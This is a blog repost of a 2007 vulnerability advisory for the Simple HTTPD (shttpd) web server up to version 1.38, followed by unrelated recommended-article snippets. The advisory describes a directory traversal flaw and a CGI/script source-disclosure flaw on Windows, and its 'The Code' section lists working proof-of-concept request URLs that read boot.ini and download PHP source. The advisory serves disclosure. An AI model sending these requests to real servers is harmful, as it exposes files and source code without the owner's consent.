Two vulnerabilities in Simple HTTPD 1.38

最新推荐文章于 2024-10-13 18:33:13 发布
最新推荐文章于 2024-10-13 18:33:13 发布
阅读量602 收藏
点赞数
文章标签: traversal cgi bugs windows application download
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cnbird2008/article/details/2034252
版权
#######################################################################

                             Luigi Auriemma

Application:  Simple HTTPD
              http://shttpd.sourceforge.net
Versions:     <= 1.38
Platforms:    Windows, *nix, QNX, RTEMS
              only Windows seems vulnerable
Bugs:         A] directory traversal
              B] scripts and CGI viewing/downloading
                 (%20 char found by Shay priel in Jun 2007)
Exploitation: remote
Date:         07 Dec 2007
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org


#######################################################################


1) Introduction
2) Bugs
3) The Code
4) Fix


#######################################################################

===============
1) Introduction
===============


Simple HTTPD (shttpd) is an open source web server created for embedded
systems.


#######################################################################

=======
2) Bugs
=======

----------------------
A] directory traversal
----------------------

Using the "../" pattern is possible to download any file in the disk on
which is located the web root directory.


--------------------------------------
B] scripts and CGI viewing/downloading
--------------------------------------

Any script or CGI in the server can be viewed/downloaded instead of
being executed simply appending the chars '+', '.', %20 (this one
reported by Shay priel in the summer 2007), %2e and any other byte (in
hex format too) major than 0x7f to the requested filename.


Note that only Windows seems vulnerable to the above bugs.


#######################################################################

===========
3) The Code
===========


A]
http://SERVER/../../../boot.ini
http://SERVER/../%2e%2e%5c../boot.ini

B]
http://SERVER/file.php+
http://SERVER/file.php.
http://SERVER/file.php%80
http://SERVER/file.php%ff


#######################################################################

======
4) Fix
======


I have posted the problems in the shttpd-general mailing-list but there
is no reply yet:

  http://sourceforge.net/mailarchive/forum.php?forum_name=shttpd-general


#######################################################################
 
cnbird2008
关注
simple-httpd:Python SimpleHTTPServer的直接替代。 通过“通过HTTP2加密”提供TLS,并自动生成自签名证书
02-03
简单httpd simple-httpd的目标是使用python -m SimpleHTTPServer来提供本地文件的简单替换。 像一样,simple-httpd支持HTTP GET和HEAD请求,并遵循准则。 HTML输出是Python模块布局和Apache目录列表布局的混合。 如果您正在寻找功能齐全甚至功能更强大的Web服务器,请查看 。 产品特点 具有启用自动功能集成的HTTP2(如果启用)。 自动自签名证书的生成和使用(如果启用)。 多种语言支持:英语,意大利语,西班牙语,爱尔兰语。 CLI给出了ISO 639-1。 证书被缓存在${HOME}/.autocert以备重用
Simple HTTPD
weixin_30835923的博客
02-19 113
http://sourceforge.net/projects/shttpd/ http://code.google.com/p/mongoose/ SHTTPD is small, fast and easy to use web server. It supports CGI, SSL,Digest Authorization. The unique feature of SHTTPD i...
python simplehttp_simple-httpd替代Python SimpleHTTPServer的简单HTTP服务器
weixin_35012431的博客
03-01 183
simple-httpdsimple-httpd is aimed to be a simple replacement for using python -m SimpleHTTPServer to serve local files. Like SimpleHTTPServer, simple-httpd supports HTTP GET and HEAD requests and adhe...
开源项目-briandowns-simple-httpd.zip
09-03
开源项目-briandowns-simple-httpd.zip,Simple HTTP server replacement for Python SimpleHTTPServer. Optional TLS via Let's Encrypt w/HTTP2
简单的Http共享文件SimpleHTTPServer
whiterbear的专栏
11-29 6212
刚刚学会了如何使用Python下的SimpleHTTPServer共享文件。 一句话共享: 命令行下输入下面的语句,即可将当前目录下的文件共享出去。 python -m SimpleHTTPServer 80Python下内置了一个Http服务器,只需要上面的一句话即可以启动该服务器,默认的端口是8000。 启动后,可以在浏览器中输入“localhost:8000”即可查看当前文件
复现BadNets: Identifying Vulnerabilities in the Machine Learning Model Supply Chain
bajiaoyu517的博客
07-06 2733
BadNets论文复现
BadNets Identifying Vulnerabilities in the Machine Learning Model Supply Chain
柯同学要谦虚
11-13 5248
摘要 基于深度学习的技术已经在各种各样的识别和分类任务上取得了最先进的性能。然而,这些网络通常训练起来非常昂贵,需要在许多gpu上进行数周的计算;因此,许多用户将培训过程外包给云,或者依赖于预先培训的模型,这些模型随后会针对特定的任务进行微调。 在本文中,我们展示了外包训练引入了新的安全风险:攻击者可以创建一个经过恶意训练的网络(一个反向涂鸦的神经网络,或者一个坏网),它在用户的训练和验证样本上很...
We found potential security vulnerabilities in your dependencies. Only the owner of this reposito...
程序员哆啦A梦,蓝胖子
07-18 2887
删除package-lock.json并同步到git 定义的依赖项./package-lock.json具有已知的安全漏洞 找到一个叫做.gitignore,把package-lock.json贴在这个文件里 [外链图片转存失败(img-V8oNIMvg-1563449856873)(https://upload-images.jianshu.io/upload_images/11158618-b...
How to Find 12 Kernel Information Disclosure Vulnerabilities in
10-25
在IT安全领域,发现并修复内核信息泄露漏洞是至关重要的任务。内核是操作系统的心脏,负责管理硬件资源和提供服务给上层应用程序。信息泄露漏洞可能导致敏感数据暴露,如内存状态、用户隐私信息,甚至系统权限。...
「端点安全」D1T1 - Finding Vulnerabilities in a Closed Source Video
12-04
「端点安全」D1T1 - Finding Vulnerabilities in a Closed Source Video Decoder Driver - Adam Donenfeld - 数据安全 基础架构安全 NGFW 安全防护 安全运营 终端安全
藏经阁-Automated-Detection-of-Vulnerabilities-in-Black-Box-Routers_
08-26
《藏经阁:黑盒路由器中的漏洞自动化检测》 网络安全是当今互联网时代的重要议题,而网络设备,尤其是路由器,作为互联网的基础设施,其安全性更是至关重要。然而,大多数网络设备采用的是专有且封闭源码的设计,这...
Fortify-Vulnerabilities in Java
07-25
Java中的漏洞防护:Web应用程序中的常见缺陷 在Java的Web应用程序开发中,安全漏洞的防护是至关重要的。漏洞的存在不仅可能导致数据泄露、系统瘫痪,甚至会造成企业的重大经济损失和声誉损害。...
用可解释的人工智能透镜发现移动流量预测中的漏洞Spotting Deep Neural Network Vulnerabilities in Mobile Traffic Forecasting
风口IT猪的成长录
05-27 75
预测移动流量模式的能力对于移动网络运营商的资源管理和地方当局的规划至关重要。多个深度神经网络 (DNN) 旨在大规模捕获移动流量模式的复杂时空特征。这些模型是复杂的黑匣子,其决策本质上很难解释。更糟糕的是,事实证明它们很容易受到对抗性攻击,从而破坏了它们在生产网络中的适用性。在本文中,我们首次深入研究了用于大规模移动流量预测的 DNN 的漏洞。我们提出了 DEEXP,这是一种新工具,它利用可解释人工智能 (XAI) 从时空角度了解哪些基站 (BS) 对预测更有影响力。挑战。
六款小巧的HTTP Server[C语言]
Sapphire521的博客
12-25 1767
1、micro_httpd - really small HTTP server 特点: 支持安全的 .. 上级目录过滤 支持通用的MIME类型 支持简单的目录 支持目录列表 支持使用 index.html 作为首页 Trailing-slash redirection 程序总共代码才200多行 这个httpd适合学习简单的Web Server编写学习,因为它只有一个简单的框架,只能够处理简单的静态页,可以考虑用来放静态页。 官方地址:http://www.acme.com/software/micro_h
记录一下:使用 python -m SimpleHTTPServer 快速搭建http服务
weixin_34167819的博客
11-12 883
为什么80%的码农都做不了架构师?>>> ...
JAVA队列
2301_80062351的博客
10-13 418
1. 队列(Queue)   1.1 概念   1.2 队列的使用    1.入队列    2.出队列    3.查找队头元素   1.3 队列模拟实现    1.入队列    2. 出队列    3.查找    4.判空和判断大小
C++:模拟实现list
2301_80373479的博客
10-10 1175
一文带你实现C++中的list
C语言刷题 LeetCode 删除单链表的重复节点 双指针法
最新发布
weixin_64593595的博客
10-13 178
C语言刷题 LeetCode 删除单链表的重复节点 双指针法
说出"BadNets: Identifying Vulnerabilities in the Machine Learning Model Supply Chain"的不足
06-09
"BadNets: Identifying Vulnerabilities in the Machine Learning Model Supply Chain"的不足包括: 1. 对攻击类型的分类不够全面,只考虑了攻击者添加恶意后门的情况,没有考虑到其他类型的攻击,如数据篡改、模型逆向等。 2. 模型的鲁棒性测试不够全面,只测试了对抗性样本的鲁棒性,没有考虑到其他类型的攻击,如对模型进行篡改或逆向工程的攻击。 3. 对模型的审计方法不够全面,只考虑了对模型架构的审计,没有考虑到对数据集、训练过程等其他方面进行审计。 4. 模型供应链的控制能力有限,只考虑了对原始模型的审计,没有考虑到对模型训练数据的审计,这可能导致攻击者通过控制数据集来攻击模型。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值